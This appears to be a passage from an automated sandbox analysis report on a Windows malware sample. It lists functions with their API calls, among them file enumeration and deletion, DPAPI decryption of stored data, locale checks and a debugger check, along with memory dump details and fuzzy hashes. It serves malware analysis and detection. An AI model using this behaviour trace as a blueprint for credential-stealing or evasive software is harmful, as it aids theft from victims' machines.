                                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                  • String ID: \*.*
                                                  • API String ID: 1415058207-1173974218
                                                  • Opcode ID: 262c42444cbb4c7113c8ff6840b6909aa1d326ae395afc5a71cd8ea782e15d4f
                                                  • Instruction ID: 47de987318eafb428d6e9afc63df3879dd5ba7490b623eb573f4dfe72a2f4575
                                                  • Opcode Fuzzy Hash: 262c42444cbb4c7113c8ff6840b6909aa1d326ae395afc5a71cd8ea782e15d4f
                                                  • Instruction Fuzzy Hash: 641260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9
                                                  Function 02F0EF87 Relevance: 13.9, APIs: 9, Instructions: 369fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • wsprintfA.USER32 ref: 02F0EFA5
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 02F0EFBC
                                                  • StrCmpCA.SHLWAPI(?,00421538), ref: 02F0F012
                                                  • StrCmpCA.SHLWAPI(?,0042153C), ref: 02F0F028
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 02F0F515
                                                  • FindClose.KERNEL32(000000FF), ref: 02F0F52A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNextwsprintf
                                                  • String ID:
                                                  • API String ID: 180737720-0
                                                  • Opcode ID: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                                  • Instruction ID: 4bd948c3a4cbedaf39d8cffb3d124bb190ecd4e532b66bac7223ab867cb530b5
                                                  • Opcode Fuzzy Hash: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                                  • Instruction Fuzzy Hash: 1EE103729122189ADB69FB60DD90EEE773AAF54740F8041DDB60A62091EF306FC9CF51
                                                  Function 02F0DCE7 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                    • Part of subcall function 02F1AB87: lstrcpy.KERNEL32(00000000,?), ref: 02F1ABD9
                                                    • Part of subcall function 02F1AB87: lstrcat.KERNEL32(00000000), ref: 02F1ABE9
                                                    • Part of subcall function 02F1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02F1AC2C
                                                    • Part of subcall function 02F1AC17: lstrcpy.KERNEL32(00000000), ref: 02F1AC6B
                                                    • Part of subcall function 02F1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02F1AC79
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 02F0DD52
                                                  • StrCmpCA.SHLWAPI(?,004214B4), ref: 02F0DD9A
                                                  • StrCmpCA.SHLWAPI(?,004214B8), ref: 02F0DDB0
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 02F0E033
                                                  • FindClose.KERNEL32(000000FF), ref: 02F0E045
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                  • String ID:
                                                  • API String ID: 3334442632-0
                                                  • Opcode ID: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                                  • Instruction ID: a1cfbb6ece88936813677b122397fa0ef02de56c95fc413733ed1c44865afe27
                                                  • Opcode Fuzzy Hash: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                                  • Instruction Fuzzy Hash: 71915672A00208DBCB14FBB0DE95DEE777AAF95340F40865CE64A961C0EE349B58CF91
                                                  Function 0040DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0040DAEB
                                                  • StrCmpCA.SHLWAPI(?,004214B4), ref: 0040DB33
                                                  • StrCmpCA.SHLWAPI(?,004214B8), ref: 0040DB49
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DDCC
                                                  • FindClose.KERNEL32(000000FF), ref: 0040DDDE
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                  • String ID:
                                                  • API String ID: 3334442632-0
                                                  • Opcode ID: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                                                  • Instruction ID: 591a4703b72fe71aa373ebdc6cd180767c9b728ba7d7680c081136e576a94052
                                                  • Opcode Fuzzy Hash: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                                                  • Instruction Fuzzy Hash: 3B91A776900104ABCB14FBB1EC469ED733DAF84304F40856EF81A961C1EE389B5DCB9A
                                                  Function 02F0F917 Relevance: 12.3, APIs: 8, Instructions: 275fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                    • Part of subcall function 02F1AB87: lstrcpy.KERNEL32(00000000,?), ref: 02F1ABD9
                                                    • Part of subcall function 02F1AB87: lstrcat.KERNEL32(00000000), ref: 02F1ABE9
                                                    • Part of subcall function 02F1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02F1AC2C
                                                    • Part of subcall function 02F1AC17: lstrcpy.KERNEL32(00000000), ref: 02F1AC6B
                                                    • Part of subcall function 02F1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02F1AC79
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 02F0F985
                                                  • StrCmpCA.SHLWAPI(?,004215BC), ref: 02F0F9D6
                                                  • StrCmpCA.SHLWAPI(?,004215C0), ref: 02F0F9EC
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 02F0FD18
                                                  • FindClose.KERNEL32(000000FF), ref: 02F0FD2A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                  • String ID:
                                                  • API String ID: 3334442632-0
                                                  • Opcode ID: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                                  • Instruction ID: 3dc69c25828c72007e053abf3314ad4f6d82076116469885f21f64d1fd95037c
                                                  • Opcode Fuzzy Hash: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                                  • Instruction Fuzzy Hash: 43B14271A01218DBCB28FF60DD95FEE777AAF54340F808299960E56190EF319B48CF91
                                                  Function 02F01937 Relevance: 11.0, APIs: 7, Instructions: 492fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,?,?,004251C4,?,?,00000000,?,00000000), ref: 02F01B8A
                                                  • StrCmpCA.SHLWAPI(?,0042526C), ref: 02F01BDA
                                                  • StrCmpCA.SHLWAPI(?,00425314), ref: 02F01BF0
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 02F01FA7
                                                  • DeleteFileA.KERNEL32(00000000), ref: 02F02031
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 02F02087
                                                  • FindClose.KERNEL32(000000FF), ref: 02F02099
                                                    • Part of subcall function 02F1AB87: lstrcpy.KERNEL32(00000000,?), ref: 02F1ABD9
                                                    • Part of subcall function 02F1AB87: lstrcat.KERNEL32(00000000), ref: 02F1ABE9
                                                    • Part of subcall function 02F1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02F1AC2C
                                                    • Part of subcall function 02F1AC17: lstrcpy.KERNEL32(00000000), ref: 02F1AC6B
                                                    • Part of subcall function 02F1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02F1AC79
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                  • String ID:
                                                  • API String ID: 1415058207-0
                                                  • Opcode ID: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                                  • Instruction ID: 9910af548e85a030492fb7a744ed8abad2675968c0d38024cf43fb5b4be897fc
                                                  • Opcode Fuzzy Hash: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                                  • Instruction Fuzzy Hash: A412CB71911258ABCB19FB60DD94EEEB77AAF54780F8041DDA60A620D0EF746F88CF50
                                                  Function 02F0E077 Relevance: 10.9, APIs: 7, Instructions: 370fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                    • Part of subcall function 02F1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02F1AC2C
                                                    • Part of subcall function 02F1AC17: lstrcpy.KERNEL32(00000000), ref: 02F1AC6B
                                                    • Part of subcall function 02F1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02F1AC79
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004214C0,00420C2E), ref: 02F0E0C5
                                                  • StrCmpCA.SHLWAPI(?,004214C8), ref: 02F0E115
                                                  • StrCmpCA.SHLWAPI(?,004214CC), ref: 02F0E12B
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 02F0E647
                                                  • FindClose.KERNEL32(000000FF), ref: 02F0E659
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                  • String ID:
                                                  • API String ID: 2325840235-0
                                                  • Opcode ID: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                                  • Instruction ID: 742dabcaff397876daec866a58cef57269e9d2fca41e6cc03728714f4110420b
                                                  • Opcode Fuzzy Hash: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                                  • Instruction Fuzzy Hash: 2BF1AB71911218DACB29FB60DD94EEEB73AAF54740FC055DAA24E62090EF346F89CF50
                                                  Function 00417B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00417BE1
                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00417BF9
                                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417C0D
                                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417C62
                                                  • LocalFree.KERNEL32(00000000), ref: 00417D22
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                  • String ID: /
                                                  • API String ID: 3090951853-4001269591
                                                  • Opcode ID: 1912af0442f4f1b3bb0e5bffceb408ffebc7a006be0e67e5919f9285ea41dafa
                                                  • Instruction ID: 4337a3d4516c1007e731de4e6e4702528bfdb1ea37c67bd3aa396c5a1b158d15
                                                  • Opcode Fuzzy Hash: 1912af0442f4f1b3bb0e5bffceb408ffebc7a006be0e67e5919f9285ea41dafa
                                                  • Instruction Fuzzy Hash: 6B415E71941118ABDB24DB94DC99FEEB378FF44714F20419AE10962281DB382FC6CFA5
                                                  Function 02F0CA87 Relevance: 10.6, APIs: 7, Instructions: 93stringencryptionCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 02F0CABA
                                                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 02F0CAD8
                                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 02F0CAE3
                                                  • memcpy.MSVCRT(?,?,?), ref: 02F0CB79
                                                  • lstrcat.KERNEL32(?,00420B46), ref: 02F0CBAA
                                                  • lstrcat.KERNEL32(?,00420B47), ref: 02F0CBBE
                                                  • lstrcat.KERNEL32(?,00420B4E), ref: 02F0CBDF
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                  • String ID:
                                                  • API String ID: 1498829745-0
                                                  • Opcode ID: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                                  • Instruction ID: 1881aa186829858df64baedc67b8181fba492faf7328f557dc186829b658e494
                                                  • Opcode Fuzzy Hash: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                                  • Instruction Fuzzy Hash: B5415FB9D4421AEFDB10DFD0DC88BEEBBB9BB44344F1045A9E609A6280D7745A84CF91
                                                  Function 0040C820 Relevance: 10.6, APIs: 7, Instructions: 93stringencryptionCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 0040C853
                                                  • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,02D45CF0), ref: 0040C871
                                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                                  • memcpy.MSVCRT(?,?,?), ref: 0040C912
                                                  • lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                                  • lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                                  • lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                  • String ID:
                                                  • API String ID: 1498829745-0
                                                  • Opcode ID: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                                  • Instruction ID: 73a89fe7b99aa7d2364cb4d3d60341f0774d48a816bcca14cb071eff5a8018ea
                                                  • Opcode Fuzzy Hash: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                                  • Instruction Fuzzy Hash: 694164B8944219EFDB10DFE4DD89BEEBBB8BB44304F1041A9F509A6280D7745A84CF95
                                                  Function 00409AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                  • LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: BinaryCryptLocalString$AllocFree
                                                  • String ID: N@
                                                  • API String ID: 4291131564-4229412743
                                                  • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                  • Instruction ID: b446a55777cc1d1e4698a5b325ac1ac72e8f4b69ff9cac50ab15cfe2fa8c9284
                                                  • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                  • Instruction Fuzzy Hash: 4811A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208059FA159B3D0C776A901CB54
                                                  Function 02F17DF7 Relevance: 7.6, APIs: 5, Instructions: 114memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                  • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 02F17E48
                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 02F17E60
                                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 02F17E74
                                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 02F17EC9
                                                  • LocalFree.KERNEL32(00000000), ref: 02F17F89
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                  • String ID:
                                                  • API String ID: 3090951853-0
                                                  • Opcode ID: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                                  • Instruction ID: 83f928b6c562160e4c200e85e8b1e1102cf0897bc325c12fb426e292c601bbd7
                                                  • Opcode Fuzzy Hash: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                                  • Instruction Fuzzy Hash: D1414972941218ABCB24EB94DD98BEEB7B5FB44740F5041D9E20AA6190DB346F85CF90
                                                  Function 02F1B5A1 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32 ref: 02F1BE09
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02F1BE1E
                                                  • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 02F1BE29
                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 02F1BE45
                                                  • TerminateProcess.KERNEL32(00000000), ref: 02F1BE4C
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                  • String ID:
                                                  • API String ID: 2579439406-0
                                                  • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                  • Instruction ID: 3535a12d6ab7e443b5051540a61b652b61d1454f9f916859f8b433293967bb9d
                                                  • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                  • Instruction Fuzzy Hash: 4A21A0BC900205DFDB14DF69FC896963BF4FB0A354F50403AE90A872A4EBB05981EF49
                                                  Function 0041B33A Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32 ref: 0041BBA2
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BBB7
                                                  • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0041BBC2
                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BBDE
                                                  • TerminateProcess.KERNEL32(00000000), ref: 0041BBE5
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                  • String ID:
                                                  • API String ID: 2579439406-0
                                                  • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                  • Instruction ID: 2759986af63cf1bc905e0f8428f5e2b998159022a12c47e0d709fe691c65c3be
                                                  • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                  • Instruction Fuzzy Hash: E921A3BC9002059FDB10DF69FD89A963BE4FB0A314F50403AE90A87264DBB45981EF4D
                                                  Function 02F074A7 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 02F074B4
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02F074BB
                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 02F074E8
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 02F0750B
                                                  • LocalFree.KERNEL32(?), ref: 02F07515
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                  • String ID:
                                                  • API String ID: 2609814428-0
                                                  • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                  • Instruction ID: 021d397f7967de8c7c913fb4ee8e58d3152aa78c91c470f83e72d483d927a1dd
                                                  • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                  • Instruction Fuzzy Hash: 3E010075B80208BBEB10DFD4DD45FAD77B9EB45704F104155F705AA2C0D670AA01CB65
                                                  Function 00407240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90), ref: 0040724D
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407254
                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407C90,80000001,004161C4), ref: 004072A4
                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 004072AE
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
